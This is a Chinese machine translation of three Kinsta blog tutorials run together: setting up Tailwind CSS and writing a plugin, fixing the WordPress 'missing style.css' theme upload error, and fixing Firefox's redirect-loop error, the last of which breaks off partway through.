- 它们带有预定义的类。
- 它们是建立在 CSS 规则之上的。
- 有了 CSS 的工作知识,它们都很容易学习和使用。
现在让我们来看一些不同之处:
- Tailwind 不同于大多数框架,因为你必须创建你的组件。例如,Bootstrap 有导航栏、按钮等组件,但是使用 Tailwind,您必须自己构建所有这些组件。
- 像 Bootstrap 这样的一些框架不容易定制,所以你被迫使用他们的设计模式。在顺风中,你控制着一切。
- 使用 Tailwind 需要对 CSS 有深入的了解。编写类名是不够的,因为您必须像编写普通 CSS 一样将它们组合起来,以达到相同的结果。在大多数其他框架中,您需要知道的是当您使用类名时,将构建什么组件。
如何开始使用 Tailwind CSS
在安装 Tailwind CSS 并将其集成到项目中之前,请确保:
- 您已经在您的计算机上安装了 Node.js,以便使用终端中的节点包管理器(npm) 。
- 您的项目已经设置完毕,文件也已创建。
这是我们目前的项目结构:
-Tailwind-tutorial
-public
-index.html
-styles.css
-src
-styles.css
接下来,为您的项目启动一个终端并运行以下命令:
npm install -D tailwindcss
上面的命令将把 Tailwind CSS 框架作为一个依赖项安装。接下来,通过运行以下命令生成 tailwind.config.js 文件:
npm install -D tailwindcss
创建时,tailwind.config.js 文件将为空,因此我们必须添加几行代码:
module.exports = {
content: ["./src/**/*.{html,js}", "./public/*.html"],
theme: {
extend: {},
},
plugins: [],
};
内容数组中提供的文件路径将使 Tailwind 能够在构建期间清除/移除任何未使用的样式。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
接下来要做的是将“@tailwind”指令添加到您的 CSS 文件中的 src 文件夹中——这是 tailwind 为您生成所有预定义实用程序样式的地方:
@tailwind base;
@tailwind components;
@tailwind utilities;
最后要做的是通过在终端中运行以下命令来启动构建过程:
npx tailwindcss -i ./src/styles.css -o ./public/styles.css --watch
在上面的代码中,我们告诉 Tailwind,我们的输入文件是 src 文件夹中的样式表,我们使用的任何样式都必须构建到 public 文件夹中的输出文件中。允许 Tailwind 监视你的文件的自动构建过程的变化;省略它意味着每次我们想要构建代码并看到想要的输出时,我们都必须运行那个脚本。
使用顺风 CSS
现在我们已经为我们的项目安装并设置了 Tailwind CSS,让我们看一些例子来充分理解它的应用。
Flexbox 示例
要在 Tailwind CSS 中使用 flex ,需要添加一个 flex 类,然后添加 flex 项的方向:
<div class="flex flex-row">
<button> Button 1 </button>
<button> Button 2 </button>
<button> Button 3 </button>
</div>
Our three purple buttons.
使用flex-row-reverse将颠倒按钮出现的顺序。
将它们一层一层堆叠起来。这里有一个例子:
<div class="flex flex-col">
<button> Button 1 </button>
<button> Button 2 </button>
<button> Button 3 </button>
</div>
Our three purple buttons.
就像前面的例子一样, flex-col-reverse 颠倒了顺序。
网格示例
当在网格系统中指定列和行时,我们采用不同的方法,通过传递一个数字来确定元素将如何占用可用空间:
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
<div class="grid grid-cols-3">
<button> Button 1 </button>
<button> Button 2 </button>
<button> Button 3 </button>
<button> Button 4 </button>
<button> Button 5 </button>
<button> Button 6 </button>
</div>
Our six purple buttons.
颜色;色彩;色调
顺风有很多预定义的颜色。每种颜色都有一组不同的变化,最亮的变化是 50,最暗的变化是 900。
这里有一张多种颜色的图片和它们的 HTML 十六进制代码来说明这一点
Customizing colors from Tailwind’s default palette. (Image source)
我们将给出一个例子,说明如何使用上面的红色为按钮元素提供背景色:
<button class="bg-red-50">Click me</button>
<button class="bg-red-100">Click me</button>
<button class="bg-red-200">Click me</button>
<button class="bg-red-300">Click me</button>
<button class="bg-red-400">Click me</button>
<button class="bg-red-500">Click me</button>
<button class="bg-red-600">Click me</button>
<button class="bg-red-700">Click me</button>
<button class="bg-red-800">Click me</button>
<button class="bg-red-900">Click me</button>
这个语法对于 Tailwind 中的所有颜色都是一样的,除了黑色和白色,它们的写法是一样的,只是没有使用数字:bg-black和bg-white。
要添加文本颜色,可以使用类text-{color}:
<p class="text-yellow-600">Hello World</p>
填料
Tailwind 已经有了一个设计系统,可以帮助你在设计中保持一致的比例。您只需要知道应用每个实用程序的语法。
以下是为元素添加填充的实用程序:
p表示整个元素的填充。py表示顶部填充和底部填充。px表示左填充和右填充。pt表示垫顶。pr表示右填充。pb表示底部填充。pl表示左填充
要将它们应用到您的元素中,您必须使用 Tailwind 提供的适当数字——有点类似于上一节中表示颜色变化的数字。我们的意思是:
<button class="p-0">Click me</button>
<button class="pt-1">Click me</button>
<button class="pr-2">Click me</button>
<button class="pb-3">Click me</button>
<button class="pl-4">Click me</button>
边缘
填充和边距的预定义实用程序非常相似。你必须用一个m代替p:
mmymxmtmrmbml
如何创建一个顺风 CSS 插件
尽管 Tailwind CSS 已经为您构建了大量的实用程序和设计系统,但您仍有可能希望添加特定的功能来扩展 Tailwind 的用途。Tailwind CSS 允许我们通过创建一个插件来做到这一点。
让我们通过创建一个添加水绿色的插件和一个在 X 轴上将元素旋转 150°的旋转工具来动手做。我们将使用一点点 JavaScript 在 tailwind.config.js 文件中创建这些实用程序。
const plugin = require("tailwindcss/plugin");
module.exports = {
content: ["./src/**/*.{html,js}", "./public/*.html"],
theme: {
extend: {},
},
plugins: [
plugin(function ({ addUtilities }) {
const myUtilities = {
".bg-aqua": { background: "aqua" },
".rotate-150deg": {
transform: "rotateX(150deg)",
},
};
addUtilities(myUtilities);
}),
],
};
现在,让我们来分析一下。我们做的第一件事是导入 Tailwind 的插件函数:
const plugin = require("tailwindcss/plugin");
然后我们继续在插件数组中创建插件:
plugins: [
plugin(function ({ addUtilities }) {
const newUtilities = {
".bg-aqua": { background: "aqua" },
".rotate-150deg": {
transform: "rotateX(150deg)",
},
};
addUtilities(newUtilities);
}),
],
制作插件后,您可能需要重新运行构建脚本。
现在插件已经准备好了,我们可以测试它们了:
<button class="bg-aqua rotate-150deg">Click me</button>
如果你做的一切都是正确的,你应该有一个浅绿色的按钮,文本在 X 轴上旋转了 150 度。
Your secret weapon for building and designing web pages? 👀 Tailwind CSS 😌Click to Tweet ## 摘要
当提到加速你的工作流程时,框架是一个无价的选择。它们可以帮助您构建美观、专业的网页,同时保持设计的一致性。Tailwind CSS 提供了许多实用的 CSS 类来帮助将你的 web 设计和开发提升到下一个层次。
这篇文章告诉我们什么是 Tailwind CSS,是什么让它成为一个框架。然后,我们查看了安装过程,并看到了一些示例,展示了如何创建自定义插件来扩展现有功能。
如果你已经了解了这一点,那么你现在已经对顺风的工作原理有了一个基本而坚实的理解。为了更好地使用这样一个实用优先的框架,如果你还没有一个坚实的基础,你必须坚持练习并增加你的 CSS 知识。
过去你使用过 Tailwind CSS 或其他 CSS 框架吗?在评论区分享你的想法吧!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何修复错误:“无法安装软件包。主题缺少 style.css 样式表"
原文:https://kinsta.com/blog/the-package-could-not-be-installed/
你为你的 WordPress 站点下载了一个漂亮的新主题,并试图将它上传到 WordPress 仪表盘。不幸的是,主题安装失败,并显示以下错误:“软件包无法安装。主题缺少 style.css 样式表。
在本文中,我们将探讨这个错误的原因以及如何解决它。我们还将向你展示如何通过对 WordPress 文件结构的基础的深入理解,以及通过帮助你确保你首先上传的是正确的文件,来避免将来出现这种错误。
开始吧!
更喜欢看视频版?
“无法安装软件包”错误出现在哪里?
这个特殊的主题上传错误显示在 WordPress 仪表盘中的外观 > 主题 > 添加新的 > 上传主题。
它主要发生在你点击选择文件按钮,选择一个要上传的文件,然后点击立即安装按钮之后。简而言之,这个错误是添加主题模块独有的,所以你不应该在 WordPress 的其他地方看到它。
Click the “Install Now” button.
错误文本本身,即“无法安装软件包。主题缺少 style.css stylesheet ,它被放在主题安装状态消息中,就在另一条消息告诉您“主题安装失败”之前
The missing stylesheet error.
当您看到“无法安装软件包”错误时,会发生什么情况?
这是少有的一次,电脑屏幕上的一个错误几乎准确地告诉你正在发生什么。第二行声明:“主题缺少 style.css 样式表。”
简而言之,你试图通过上传到你的 WordPress 仪表盘来安装一个 WordPress 主题。它包含一个. zip 文件,其中填充了一个复杂的主题文件目录,该目录包含代码、样式表以及管理和呈现你的仪表板、前端界面和许多其他 WordPress 元素的职责。
这个错误特别表明,要么是 style.css 样式表不在 WordPress 文件集合中,要么是 WordPress 很难找到样式表,因为你上传的文件不正确。
简而言之,错误的发生是因为它无法检测到 style.css 文件。它是由于以下原因之一而发生的:
- 因为主题开发者犯了一个错误,主题根目录中的 style.css 文件丢失了。
- 目录中缺少了 style.css 文件,因为您在某个时候不小心删除了它。
- style.css 文件其实在根目录下,但是你还没有把目录正确上传到 WordPress。当你在上传前没有解压文件时,有时会发生这种情况。
- 你正试图上传一个不属于 WordPress 的文件——它可能根本不是主题文件。
什么是 style.css 样式表?
你的 WordPress 文件目录包含许多文档和文件夹,包括 PHP、CSS 和 HTML 代码。
CSS,或级联样式表,指的是一种与 PHP 和 HTML 结合使用的网页设计语言。CSS 的主要原因是用颜色、格式和字体将静态网页设计元素风格化。简单地说,CSS 让你的网站内容看起来很漂亮。
一个基本的例子是你网站上的一个简单的图片。HTML 只在样式方面做了这么多。尽管如此,CSS 通过将图像移动到页面上的任何位置、添加边距、填充、背景和许多其他元素来增强您的设计可能性,从而为您的内容提供更直观的方法。
然而, style.css 电子表格不能单独工作。它与 WordPress 中的所有目录交互,并且经常与其他编程语言一起工作以产生想要的结果。
要获得详细的指南,请阅读我们的文章。
style.css 样式表应该在哪里?
样式表是所有 WordPress 主题的一部分。因为这是 WordPress 控制网站视觉设计和布局的主要方式,所以它是一个必需的文件。
这意味着无论何时购买或下载主题,都应该在主题文件中找到一个 style.css 样式表。
注意:通常要解压主题文件包才能查看主题文件。
例如,我们下载了 Hello Elementor 主题,打开主题文件显示文件和文件夹列表,包括 style.css 表单。
Finding the style.css stylesheet.
打开 style.css 表单显示其内容,从作者的主题名称等基本信息开始。您会注意到,它告诉您不要更改该文件的任何部分,因为许多主题更喜欢您在仪表板或另一个自定义目录中进行 CSS 修改。
An open example of the style.css stylesheet.
向下滚动, style.css 样式表显示了一长串 CSS 片段,所有这些组合在一起使你的主题看起来就像它那样。
CSS code in the style.css stylesheet.
因此, style.css 样式表应该在每个主题文件目录中,通常位于其他 css 文件附近以及资产和模板文件夹附近。
看到“无法安装软件包”错误后会发生什么?
一个没有 style.css 样式表的主题文件夹是没有用的,至少在上传到 WordPress 和制作一个功能齐全的主题时是这样。
上传根目录是不可能的,因为没有 style.css 样式表,WordPress 会阻止所有上传文件的尝试。这样做的原因是因为一个丢失的样式表可能会破坏或损害整个 WordPress 基础设施。
此外,您还会收到错误消息:“无法安装软件包。主题缺少 style.css 样式表。
好消息是,之前在你的 WordPress 网站上激活的任何主题仍然存在。对你的网站没有任何损害,你也不能上传新的主题。
然而,你可能想要替换当前的主题,所以有必要通过下面的解决方案来替换旧的并安装新的主题。
如何修复“主题缺少 style.css 样式表”错误?
在这一节中,我们将概述出现缺少样式表错误的两个主要原因,以及如何解决这些问题的信息。
如何解决主题缺少 Style.css 文件的情况
一个丢失的 style.css 文件意味着两种情况之一:主题开发者(可能是你)没有将它包含在根目录中,或者你自己无意中删除了 style.css 文件。
对于第一种情况,我们建议采取以下行动:
- 联系主题开发者,通知他们问题:虽然可能性不大,但可能是下载不好,或者开发者端的某人/某物出错了。声誉好的主题开发者应该会给你一个新的主题文件的快速响应。如果你是主题开发者,请阅读这篇关于创建子主题的指南,尤其是关于制作样式表的部分。
- 寻找一个新的主题:考虑到一个优秀的主题开发者很少会错过最关键的部分,这很可能是最好的行动方案。也许你从一个粗略的来源或者一个正在学习如何编码的初学者那里下载了一个主题。
您可以添加一个 style.css sheet,但是这种做法违背了使用预制主题的初衷。更不用说,一个本来应该有样式表的主题,现在却没有了,就不能正常工作了。
如何解决 WordPress 无法识别 style.css 表单的情况
有时,当你试图在仪表板中上传主题目录中的 style.css 工作表时,WordPress 无法识别它。
原因如下:
- 你没有正确上传主题。
- 您必须从开发人员处解压缩原始文件,以显示主题文件。
- 主题文件不是为 WordPress 准备的。
- 该文件不是一个主题文件,而是其他东西。
- style.css 不在根目录的正确位置。
其中一些原因可能看起来很简单,但通常最表面的原因会导致令人沮丧的问题。
请查看以下部分,了解如何根据根本原因解决这些情况。
正确上传主题
您可能看到“无法安装软件包”的一个原因是。主题缺少 style.css stylesheet”错误是由于您上传主题文件的过程造成的。
一个新用户,甚至是一个有经验的用户,可能会不小心偏离上传主题文件的最佳步骤。
请阅读我们关于安装 WordPress 主题的指南,以确保你遵循正确的步骤。这篇文章涵盖了寻找最好的 WordPress 主题和安装方法,比如通过仪表板或 FTP。它也指导你通过稍微不同的方式安装免费和高级主题。
查看主题文件是否需要解压缩
许多主题上传错误的发生是因为一个压缩的下载文件。对于认为 WordPress 只接受压缩文件的人来说,这有点令人困惑。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
但是,有些主题开发者会在压缩文件中给你一个压缩文件,你必须解压原始包才能找到只包含主题内容的有效上传文件。
例如,你可能会发现一个主题开发者将其他文档打包到原始下载中,所以 WordPress 会查看所有这些内容,并想知道实际的主题文件在哪里。
虽然大多数著名的主题开发者都知道这种混乱,但是我们偶然发现了一种罕见的情况,你必须解压缩第一个主题下载才能看到用户手册和其他内容。
除了上一点中上传主题文件的错误方式之外,这是你在寻找其他方法之前应该解决的第一个问题,考虑到这是一个简单的解决方法,主题开发者做这个还是有点熟悉的。这也只有当你从第三方开发者那里购买一个主题时才会发生,就像 WordPress.org 主题库限制奇怪包装的主题文件一样。
因此,假设您从第三方开发者上传了一个压缩文件,却发现您收到了错误消息:“无法安装该包。主题缺少 style.css 样式表。
很有可能你所要做的就是解压主题开发者提供的原始文件,在其中提取另一个 zip 文件。
“The package could not be installed” error.
要解决这个问题,请转到您最初从主题开发人员那里下载的文件。
它很可能是一个 ZIP 文件,这对于作为主题上传到 WordPress 是有意义的,但是它可能包含额外的内容文件,使文件夹变得混乱,并使 WordPress 很难识别主题文件。
Find the theme’s zipped download file.
因此,打开或解压缩文件,提取其中的内容。这通常是通过右键单击并选择您喜欢的解压缩或存档工具。
Unzip the downloaded theme package.
现在,打开解压后的文件以显示其内容。正如您在这个例子中看到的,主题开发者在主题下载的根目录中包含了一个 readme.txt 文件和另一个内容文件夹。他们在这个区域也有真正的压缩主题文件。这是你需要上传到 WordPress 的实际主题文件。
回到外观 > 主题 > 添加新的 > 上传主题从你的电脑中选择一个文件。然后,确保您选择了这个压缩的主题文件,没有任何额外的内容(比如本例中的 ReadMe 文档)。
The actual theme file.
请记住,您可能会完成这个故障诊断过程,并发现这不是一个奇怪的主题包装的问题。如果您在开发人员提供的原始主题包中没有看到压缩的主题文件,请考虑查看下面的其他故障排除提示。
弄清楚主题文件是否是为 WordPress 准备的
许多网站主题存在于网上。你喜欢的主题设计并不少见,但当你购买后发现它实际上并不适合 WordPress。例如,ThemeForest marketplace 为各种内容管理系统和网站建设者出售网站模板,包括 Drupal、Joomla、 Webflow 和 Shopify。
每个平台都有自己的主题根文件结构,所以 WordPress 会拒绝任何试图为 Bigcommerce 或 Magento 等其他系统上传主题的行为。
请记住,在这种情况下,您可能会看到“主题缺少 style.css 样式表”错误。毕竟,来自 Shopify 或 Drupal 的主题目录可能将其 style.css 表放在不同的地方。但是,您也可能会看到另一个错误。
厌倦了低于 1 级的 WordPress 托管支持而没有答案?试试我们世界一流的支持团队!查看我们的计划
至于修复这个问题,你要做的就是去掉不兼容的主题文件,选择一个新的。
将来,仔细看看所有的主题产品页面,确保它们是为 WordPress 而不是其他东西准备的。例如,大多数 theme forest——以及其他高级主题产品页面——会在页面上多次显示该主题所在的平台。查看页面上的类别、标题和图片。
Seek out mentions of “WordPress” on product pages.
大多数主题销售者还包括一个关于该主题的软件类型或版本的区域。再次注意,WordPress 是列出的主要软件。
Check out the WordPress software version.
或者你可以坚持使用全 WordPress 库,比如 WordPress 主题目录。
如果你在网上找不到任何关于主题的信息,请查看主题目录。尽管每个 WordPress 主题目录都有不同的配置和文件,你可以通过寻找一些特定的文件来判断它是否是一个 WordPress 主题。
所有的 WordPress 主题在根目录中都有一个 style.css 表。您还应该看到像资产和模板潜在文件夹这样的文件夹。找出 index.php、、、等、的文件。你有时会在其他平台的主题中看到这些,但是它们通常被赋予不同的名称或者位于其他地方。****
Make sure the stylesheet is in the right place.
判断它是否是一个主题文件
你可以上传许多类型的压缩文件夹到 WordPress,有时很难看出它是不是主题文件。从表面上看,插件文件和主题文件没有什么不同。
对于来自另一个 WordPress 站点或 Tumblr 或 Blogger 等平台的站点导入文件,也可以这么说。你可能还会发现,你正试图上传一个 WooCommerce 产品或 WXR 文件,用于导入帖子和页面等项目。清单还在继续,但是想法是这些文件没有一个和 WordPress 主题文件是一样的。
因此,首先仔细检查你上传的内容是很重要的。你可以在电脑上点击一个名称相似的文件类型,或者你很难区分最近下载的插件文件和同一时间下载的主题文件。
避免这种情况的主要方法是当你保存和上传 WordPress 文件时,保持有条理和专注。请确保将主题文件保存在容易记住的位置,并在下载到电脑时知道文件的名称。
区分主题文件和其他面向 WordPress 的文件的另一种方法是了解每个文件的结构。
我们推荐阅读关于 WordPress 文件和使用它们的指南,特别是 T2 WordPress 主题目录部分。这样,你就积累了关于 WordPress 文件夹结构的知识,并且当你看到一个文件的内容时,你就能识别出它是做什么的。
对于这种情况,请打开您尝试上传的文件,并确保它看起来像一个主题文件。
假设我们有两个文件,我们不记得主题的具体名称。你可能很难决定这两个中的哪一个应该上传到 WordPress。我们知道其中一个是插件文件,另一个是主题文件。从拉开拉链开始,看看里面是什么。
Deciding which file is for a theme.
分别打开每个文件来分析内容。
Open each file directory.
这个文件有像插件、资产、模块和类这样的文件夹。它不包括标准的主题文件夹和文件。尽管所有的插件文件看起来都有点不同,但可以肯定地说,这看起来更像是一个插件,而不是一个主题。
This directory looks like a plugin.
另一个文件展示了大量的文件夹和 PHP 文件。这个 style.css 文件就在里面,还有主题要点,比如 footer.php、header.php和sidebar.php。在主题文件中看到 CSS、字体和模板部件的文件夹也是相对常见的。
因此,这是我们正在寻找的主题文件,另一个是插件。将来,请留意主题文件的经典属性,以确保您上传了合适的文件。
An example of a theme file.
确保 style.css 文件位于正确的位置
无论是自己做的还是开发者做的, style.css 文件都有可能在正确的地方缺失。
为什么会出现这种情况并不重要,只是 WordPress 正在根目录中搜索 style.css 文件,它找不到它。
要解决这个问题,检查主题的根文件夹并寻找 style.css 文件。
我们打开了 TwentyTwenty 主题的根文件夹,但似乎没有显示出 style.css 样式表。有可能你在整理时无意中把它拖到了其他文件夹中,所以你至少应该花几秒钟点击这些文件夹,看看它是否在那里。
Root folder missing the stylesheet.
原来我们已经把它移到了模板文件夹中。如果 style.css 工作表不在根文件夹中,WordPress 可能很难识别它,所以把它移回它所属的根文件夹。
Stylesheet located in the wrong place.
摘要
缺少 style.css 样式表错误源于一个有缺陷的主题文件,只有当你试图在 WordPress 的添加主题部分上传一个文件时,它才会出现。
看到该消息的主要原因包括:
- style.css 文件丢失,原因是开发人员没有将它包含在目录中。
- style.css 文件丢失,因为您不小心删除了它或将其移动到了其他地方。
- 你没有以正确的方式上传主题文件。
- 您必须解压缩文件,以显示开发人员给您的原始包中的实际主题文件。
- 主题文件不是为 WordPress 准备的,而是为 Shopify、Joomla 或 Drupal 等其他平台准备的。
- 该文件不是主题文件。它是其他的东西,比如一个插件文件,甚至是你电脑上的一个随机文件或压缩文件。
使用本指南解决您的主题文件问题,如果您仍有问题,请联系 Kinsta 客户支持。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何修复 Firefox 的“页面没有正确重定向”错误
原文:https://kinsta.com/blog/the-page-isnt-redirecting-properly/
你有没有试过在 Firefox 中访问你的网站,却收到一条信息告诉你“页面没有正确重定向”?
该错误消息是 Mozilla Firefox web 浏览器特有的,表明您的站点上的重定向存在一些问题。这可能是由几个原因造成的,也可能只是一个原因。下面我们帮你弄清楚。
在这篇文章中,你将学习如何修复 WordPress 网站、 Nginx 服务器和 PHP 应用的“页面没有正确重定向”错误信息。同样的步骤也可以解决您可能在 Google Drive 或您正在访问的其他网站上看到此消息的情况。
我们走吧!
“页面没有正确重定向”是什么意思?
当 Firefox 陷入无限重定向循环时,会显示“页面没有正确重定向”错误。
An example of the “The page isn’t redirecting properly” error in Firefox.
例如,“第 1 页”可能会将你重定向到“第 2 页”,这可能会将你重定向回“第 1 页”,然后将你直接重定向回“第 2 页”,如此循环往复。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
Firefox 不会永远陷入这个重定向循环,而是会放弃并告诉你“页面没有正确重定向”
这个问题几乎可以出现在任何网站上。在某些情况下,你可能会在 Google Drive 或 YouTube 上看到它。或者,如果你是一个 WordPress 网站管理员,当你试图访问你的 WordPress 网站时,你可能会看到它。
如果你也使用 Chrome 浏览器,你可能会遇到同样的问题,但是名称不同:ERR_TOO_MANY_REDIRECTS。我们有一整篇关于如何修复 ERR_TOO_MANY_REDIRECTS 错误的帖子,该帖子中的所有提示也适用于 Firefox 的“页面没有正确重定向”错误,因为这是相同的基本问题。
如果你使用 Mozilla Firefox,你可能会看到这条消息。👀万幸的是,解决的办法只是一键推开⬇️ 点击推文
为什么会出现“页面没有正确重定向”的消息
这个错误消息的根本原因总是你遇到问题的站点上的一些重定向错误配置。
然而,这种错误配置可能有许多不同的原因,这使得追踪问题变得有点棘手。
在这篇文章的其余部分,我们将分享一些提示和策略,你可以用来诊断和修复是什么导致了错误。
首先尝试这些修复
一会儿,我们将分享在 WordPress 站点、Nginx 和 PHP 上修复这个错误信息的具体故障排除步骤。
但是,在您执行这些步骤之前,或者如果您遇到了您无法控制的网站问题(如 Google Drive 或 YouTube),我们建议您首先执行这两个基本的故障诊断步骤。
执行这两个步骤将自动修复许多重定向问题。如果这些方法不能解决问题,您可以继续进行更具体的修复。但是如果这些建议真的能让事情重新运转起来,你会为自己节省很多时间和挫折。
1.清除您的浏览器缓存
当遇到任何错误时,你应该做的第一件事就是清空你的火狐浏览器缓存。
Firefox(和所有其他浏览器)会将网站的静态文件存储在本地计算机的缓存中以提高性能。这样,Firefox 就可以直接从你的电脑上加载这些资源,而不是在每次加载新页面时重新下载。
但是,如果这些文件由于某种原因已经过期,那么就会触发许多不同的错误,包括“页面没有正确重定向”错误。通过清空你的缓存,你将迫使火狐重新下载文件的新版本,这通常可以解决问题。
首先,在浏览器的导航栏中输入以下文本,打开隐私设置:
about:preferences#privacy
或者,您可以按照以下说明手动打开此区域:
- 点按右上角的汉堡图标。
- 从下拉菜单中选择选项,打开设置区。
- 转到隐私&安全选项卡。
在隐私&安全区域,找到 Cookies 和站点数据部分,点击清除数据按钮:
Access the Firefox browser cache data and click the “Clear Data” button.
在出现的弹出窗口中,选择缓存网页内容选项,然后点击清除:
Clearing the Firefox browser cache.
现在,重新加载你有问题的页面,看看它是否工作。如果不是,继续下一步。
2.为有问题的站点清除 Cookies
“页面没有正确重定向”消息的另一个常见原因是网站的 cookie有问题。
与浏览器缓存一样,解决方案是清除有问题站点的浏览器 cookies。
为了避免注销您访问的每个站点,您只需要清除您遇到问题的特定域的 cookies。删除你所有的 cookies 没有问题——只是不得不再次登录每个网站很痛苦,这就是为什么采用有针对性的方法可能更好。
要执行这种有针对性的删除,请返回到cookie 和站点数据设置(就像您对浏览器缓存所做的那样),只是这一次,单击管理数据按钮:
Searching cookies for individual sites through the “Manage Data” button.
在弹出窗口中:
- 搜索你遇到问题的网站的域名。
- 从列表中选择它。
- 点击删除选中的。
Clearing the cookies of a single site with the “Remove Selected” button.
在出现的确认提示中,再次点击移除:
Confirm that you want to clear cookies for the selected site.
然后,重新加载页面,看看它是否再次工作。请注意,如果网站需要用户名/密码,您需要再次登录。
如果这些提示都没有解决问题,你可以继续阅读一些更有针对性的解决方案。
如何修复 WordPress 中的“页面没有正确重定向”
如果你在你的 WordPress 网站上看到“页面没有正确重定向”的信息,并且上面的两个故障排除步骤没有解决问题,你可能需要钻研一些 WordPress 特有的修复。
正如我们上面提到的,这个错误是由你的网站上的一些重定向问题引起的。在 WordPress 上,这个重定向问题可能来自以下任何一个原因:
为了帮助您确定应该从哪里开始故障诊断,您可以使用重定向检查器工具,如 HTTP Status 和重定向检查器来分析您的重定向循环中发生了什么。只需输入您遇到问题的网站的 URL,该工具将按步骤分解重定向链。
例如,如果您看到您的网站在网站的 HTTP 和 HTTPS 版本之间来回重定向,这是一个很好的迹象,表明问题与您网站上的 HTTPS 或 SSL 使用有关,因此您应该从那里开始故障排除。
如果您看不到任何模式,您可以按顺序完成以下故障诊断步骤。
检查您的 HTTPS 设置
您站点的 HTTPS 设置可能是重定向错误配置的常见来源。这里有一些潜在的问题:
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
- 在未安装 SSL 证书的情况下强制 HTTPS:如果您试图在未安装 SSL 证书的情况下强制使用 HTTPS,将会触发此错误。如果你在 Kinsta 托管,我们已经写了一个关于使用 SSL 证书的指南。否则,请向您的主机支持寻求帮助。
- 使用 SSL 插件:只要有可能,我们建议更新你的硬编码链接,使用 HTTPS,而不是使用像真正简单的 SSL 这样的 SSL 插件。你可以通过运行搜索并替换你网站数据库上的来做到这一点。如果您是 Kinsta 的客户,请寻求支持,我们可以为您做到这一点。
- 有一个错误配置的 HTTP 到 HTTPS 的重定向:强制重定向所有 HTTP 流量到 HTTPS 是好的,但是你要确保你已经正确设置了重定向。
检查 Cloudflare SSL 设置
如果你已经配置你的 WordPress 站点使用 Cloudflare ,你可能会看到由于 Cloudflare 的 SSL 设置导致的错误信息。通常,当您已经在站点的服务器上安装了 SSL 证书,但仍在使用 Cloudflare 的灵活 SSL 设置时,会发生此错误。
要解决这个问题,您需要从 Cloudflare 的灵活的 SSL/TLS 加密模式切换到它的完全选项。
打开您的 Cloudflare 仪表盘,转到 SSL/TLS 选项卡。然后,将 SSL/TLS 加密模式从灵活改为完全(或完全(严格)):
Changing Cloudflare SSL settings to “Full.”
信息
如果您使用的是 Kinsta 基于 Cloudflare 的内容交付网络,您无需担心这一点,因为我们会为您配置一切。
检查你的 WordPress 站点设置
如果你仍然可以访问你的 WordPress 仪表盘,你应该检查你的站点 URL 设置(设置>常规)。
这些应该互相匹配。此外,如果你已经设置了从 WWW 到非 WWW 的重定向(反之亦然),你需要确保你的网站设置与你设置的永久 URL 相匹配。
例如,如果你设置了一个重定向来发送从https://yoursite.com到https://www.yoursite.com的所有流量,你应该确保你的 WordPress 网站地址是https://www.yoursite.com。
Checking your WordPress site address.
如果你不能访问你的 WordPress 仪表盘,你可以通过编辑你站点的 wp-config.php 文件来手动覆盖这些值。你可以通过用 FTP 连接到你的服务器来访问和管理这个文件。
将以下代码片段添加到文件中,确保将示例 URL 替换为您站点的实际 URL:
define('WP_HOME','https://yourdomain.com');
define('WP_SITEURL','https://yourdomain.com');
你可以学习更多关于改变你的 WordPress URL 来更深入地了解这些和其他方法。
暂时禁用 WordPress 插件
在某些情况下,如果出于某种原因触发了重定向循环,WordPress 插件会导致“页面没有正确重定向”的错误。这个问题可能是由于插件本身或兼容性(与另一个插件,主题,或其他自定义代码)。
为了快速测试是否是插件问题,你可以尝试关闭你所有的插件。如果你的网站在你关闭它们后开始工作,你就会知道是你的插件导致了这个问题。
需要为您的电子商务网站提供超快的、可靠的、完全安全的托管服务吗?Kinsta 提供所有这些服务,并由 WooCommerce 专家提供 24/7 的世界级支持。查看我们的计划
如果你仍然可以访问你的 WordPress 仪表盘,你可以从插件区域停用你的插件。
如果您无法访问您的仪表板,您可以通过 FTP 禁用您的插件:
- 使用 FTP/SFTP 和连接到您的服务器,您的首选 FTP 客户端。
- 导航到 wp-content 文件夹。
- 将插件文件夹重命名为插件 _ 旧。
- 打开您的网站,看看问题是否仍然存在。
Manually disabling plugins using FTP.
如果你的网站开始工作,登录你的 WordPress 仪表盘。登录后,您可以返回 FTP 客户端,将文件夹重新命名为 plugins 。
当你进入 WordPress 仪表盘的插件区域时,WordPress 将会关闭你所有的插件。然后你可以通过你的仪表板一个接一个地重新激活它们,每次都再次测试你的站点,直到你找到导致问题的插件。
检查服务器上的重定向
如果您在服务器上设置了错误配置的重定向,这也可能导致重定向循环问题。
如何解决这个问题取决于您的主机是使用 Apache 还是 Nginx web 服务器。Kinsta 只使用 Nginx,但其他一些 web 主机使用 Apache 。
阿帕奇。htaccess 文件
使用 Apache,您可以通过使用来设置重定向。htaccess 文件。然而,这里的错误配置可能会触发 Firefox 中的错误消息。
要解决这个问题,你可以告诉 WordPress 生成一个新的。htaccess 文件:
- 使用 FTP 连接到您的服务器。
- 找到你现有的。htaccess 文件—它应该在根文件夹中。
